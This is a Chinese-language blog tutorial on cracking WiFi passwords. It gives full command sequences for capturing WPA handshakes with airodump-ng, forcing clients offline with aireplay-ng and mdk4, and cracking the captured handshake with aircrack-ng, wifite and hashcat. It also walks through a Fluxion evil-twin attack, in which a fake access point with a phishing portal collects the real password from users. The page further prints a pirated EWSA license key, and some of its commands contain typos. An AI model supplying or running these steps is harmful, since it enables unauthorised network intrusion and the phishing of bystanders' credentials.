Drollery Medieval drollery of a knight on a horse

🏆 欢迎来到本站: https://xuchangwei.com/希望这里有你感兴趣的内容

flowery border with man falling
flowery border with man falling

Safe: 破解

WIFI

airmon 抓包

准备工作

  • vmware虚拟机
  • 安装kali操作系统,官方下载
  • 无线网卡一张,用来监听wifi

操作

1.vmware 菜单栏载入网卡。

虚拟机–> 可移动设备–>找到网卡点击连接

2.进入kali终端提升权限

进行kali系统,打开终端切到root用户。

sudo su

#查看网卡
airmon-ng

#扫描当前所有wifi

airodump-ng wlan0

#抓取握手包
airodump-ng -w freedom -c 1 --bssid 9E:90:61:98:99:FA wlan0 ignore nefative-oneaa

#-c wifi 对应的信道
#bassid 是对应的mac地址

3.开拓攻击

再开一个终端执行攻击命令

aireplay-ng -0 20 -a 9E:90:61:98:99:FA -c BC:17:B8:CA:EE:82 wlan0
#20 表示攻击次数
#-a 是路由走的mac
#-c 表示客户机的mac

多试几次,直到看到握手包有 WPA handshae 出现,证明抓取到了。/home/kali/freedom-01.* 就是抓取到的握手包文件

这时抓取握手包可以停了。下面破解密码.

核心原理:在进行攻击时,让之前连接wifi的客户机强制下线,下线之后客户机重新连接我们才能抓取到握手包。如果没抓取到可能是攻击次数不够。

4.使用密码文件破解wifi

找到一个好的字典文件进行破解,可能网上下载。这里使用kali自带的字典。

aircrack-ng -w /usr/share/wordlists/wifite.txt freedom-.*ivs

出现KEY FOUND,就可以看到密码了。

fluxion

fluxion钓鱼攻击,不跑密码,简单省心

https://github.com/FluxionNetwork/fluxion.git

原理

  • 通过路由器发送特定的包文件,使得所有连接这个wifi的客户端断开连接。当客户端重新连接路由器时,会发送包含握手包的数据到路由器,握手包中包含加密的wifi密码。此时这个加密的握手包也会被我们的攻击电脑获得
  • 使用pollution创建一个虚假的不需密码登录的同名开放wifi,并且对路由器进行攻击,使得所有的客户端都连不上这个真正的wifi。此时手机就会自动连接这个虚假的wifi。
  • 连上钓鱼wifi后,会要求对wifi进行验证,从而获得wifi密码。

准备

准备带监听功能无线网卡,或者在淘宝平台搜索kali linux 无线网卡

支持5G 不支持5G
RTL8812AU Ralink 3070(AWUS036H)
RTL8811AU Ralink 8187(AWUS036NH)
Ralink RT3572 AR9002U (TPLINK WN722N)
MediaTek MT7612U Realtek RTL8186L
Realtek RTL8814AU Atheros AR9170

操作

1.打开虚拟机,连接无线网卡。vmware

虚拟机–> 可移动设备–>找到网卡点击连接

2.打开命令行终端

sudo su

#下载fluxtion
git clone https://github.com/FluxionNetwork/fluxion.git

cd fluxion

./fluxion.sh -i  # -i 系统自动下载缺少的组件

#提示缺少 pyrit xterm
#安装xterm
sudo apt-get -y install xterm

#安装pyrit
sudo apt-get -y install libpcap-dev

sudo apt-get -y install python2.7-dev libssl-dev zliblg-dev libpcap-devanagari

git clone https://github.com/JPaulMora/Pyrit.git

cd pyrit

python setup.py clean && python setup.py build && python setup.py install

安装好之后,运行程序

cd fluxion

./fluxion.sh

[2] Handshake Snooper 检索WPA/WPA2加密散列

#选择第2个,扫描所有wifi热点

[3] 扫描所有信道(2.4GHz & 5Ghz)

#选择3,找到目标wifi后,按 Ctrl + c

[012] TP-LINK_9AEE

#输入目标wifi的序号 12

[2] 跳过

#选择第2个

[重置攻击]

#选择第2个,重置攻击

[3] mdk4 解除认证方式(侵略性)

#选择3

[2] cowpatty 验证(推荐)

#选择 2 ,推荐

#下面都选择推荐的,现在已经开始抓取握手包了。手机查看wifi,如果发现闪烁就说明抓到包了

[1] 选择启动方式

#选择1

[1] 专属门户 创建一个“邪思的双胞脸”接入点

#选择1

[2] 跳过

#选择2

[2] 重置攻击

#选择2

[2] wlan0 [*] Ralink Technology, Corp. RT5370

#选择2,就是我们插入的无线网卡


[1] mdk4

#选择1

[1] 流氓 AP - hastapd(推荐)

#选择1

[1] hash - cowpatty

#选择1

[1] 使用抓取到的hash文件

#选择1

[2] cowpatty 验证(推荐用这个)

#选择2 推荐的

[1] 创建SSL 证书

#选择1

[1] 断开黑网络(推荐)

#选择1

[*] 选择钓鱼热点的认证页面
  [03] 通用认证网页 Chinese

#选择3 中文认证页面,开始创建钓鱼wifi. 可以发现出现了2个同名wifi

#手机连不上真正的wifi,就会自动进行钓鱼wifi

#手机用户在弹出的认证页面输入正确wifi密码。kali系统会保存密码,有提示位置

#打开文件就可以看到密码了
...
Password: 12345678ert
...

wifite

wifite最简单的破解wifi工具,点击几点直接抓包

kali自带工具,终端输入wifte就能运行

https://github.com/kimocoder/wifite2

支持的攻击模式

  • WPA:WPA握手捕获+离线破解。 最常用的抓包模式。前提:当前路由至少有一个客户端连接
  • WPA:PMKID哈希捕获+离线破解。这个模式不需要有客户端连接,但路由器需要支持且开启了漫游功能,一般企业级路由器有才这个功能

    安装组件:apt install hcxdumptool ; apt install hcxtools

  • WPS:在线暴力破解PIN码攻击。PIN码通常只有8位数字,但很多路由器都有防PIN功能。

操作WPA抓包

1.打开虚拟机,连接无线网卡。vmware

虚拟机–> 可移动设备–>找到网卡点击连接

2.打开命令行终端

wifite --kill #确保只有一个服务在运行

#Ctrl+c停止扫描。在扫出wifi的结果中 CLIENT 中有数字代表有客户端连接
#如目标wifi [4] TP_LINK_CC7D

#输入4  开始抓包
#可以在手机中观察wifi状态。 wifi正在疯狂重连
#出现 saveing copy of handshake to hs/handshake_TP_LINK_CC7D_xxx.cap saved时,说明已经抓到握手包,一般1-2分钟
#出现Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist 说明在使用默认字典文件破解。
#使用默认字典,如果解不出也很正常。解决方法:换一个更大的字典,或者把握手包拷贝到本地电脑用更高效的工具破解 ewsa/hashcat

指定字典破解

kali自带字典位置: /usr/share/wordlists 。小字典 wifite.txt 20w行, 大字典 解压 gip -d rockyou.txt.gz 1000W行密码

sudo wifite --wpa --dict /usr/share/wordlists/wifite.txt --kill

同时攻击多个wifi目标

sudo wifite --wpa --dict wifite.txt --kill
#输入多个目标用逗号分开。如 1,2,35

hashcat, ewsa

hashcat, ewsa跑字典最快工具,最高一秒跑40w字典。使用GPU

跑包速度:

  • EWSA7.1: 1.9w/s
  • Hashcat: 4.5w/s

ewsa 安装和使用

需要输入注码:EWSA-173-HC1UW-L3EGT-FFJ3O-SOQB3

中文界面: 菜单栏 Options -> Language –> Chinese

操作:

  • 点击导入数据,添加需要破解的握手包
  • 菜单栏 选项–>破解选项,添加准备好的字典文件
  • 点击开始破解

hashcat 安装和使用

在安装目录打开cmd。 目录上面输入cmd回车

hashcat -I #查看电脑的配置 cpu和GPU的信息

操作

  • .cap抓包文件转换为hc格式

    在线转换地址: https://hashcat.net/cap2hashcat

  • 字典暴力破解

    #使用单个字典
    hashcat -m 2200 xxx.hc2200 password.txt #按s查看实时跑包状态
    
    #使用多个字典
    
    hashcat -m 22000 xxx.hc22000 pass\*.txt
    
  • 掩码暴力破解

    例如密码是8位的纯数字可以用 ?d?d?d?d?d?d?d ,代表所有组合, ?d 表示0-9任意数字

    hashcat -a 3 -m 22000 xxx.hc22000 ?d?d?d?d?d?d?d?d
    

更多使用方法参考官网: https://hashcat.net/wiki/doku.php?id=hashcat

linux 安装

sudo apt install -y build-essential git
git clone https://github.com/hashcat/hashcat.git
make && make install
newgrp

水滴和奶瓶

经典抓包工具. 使用cdlinux镜像创建虚拟机

https://distrowatch.com/table.php?distribution=cdlinux

操作

1.打开虚拟机,连接无线网卡。vmware

虚拟机–> 可移动设备–>找到网卡点击连接

2.双击打开minidwep-gtk 水滴工具

  • 点击“扫描”,扫描周围所有wifi
  • 选择目标wifi,点击“启动”抓取握手包

    弹出提示时,说明握手包已经抓取到了。选择no,把握手包保存下来。提示保存位置。ok

    选择yes,把握手包拷贝到home目录下。

  • 点击“跑字典”,选择home目录下的握手包。

    指定字典文件。选择默认的wordlist.txt

    可以使用U盘把握手包拷贝出来,用更高效工具破解。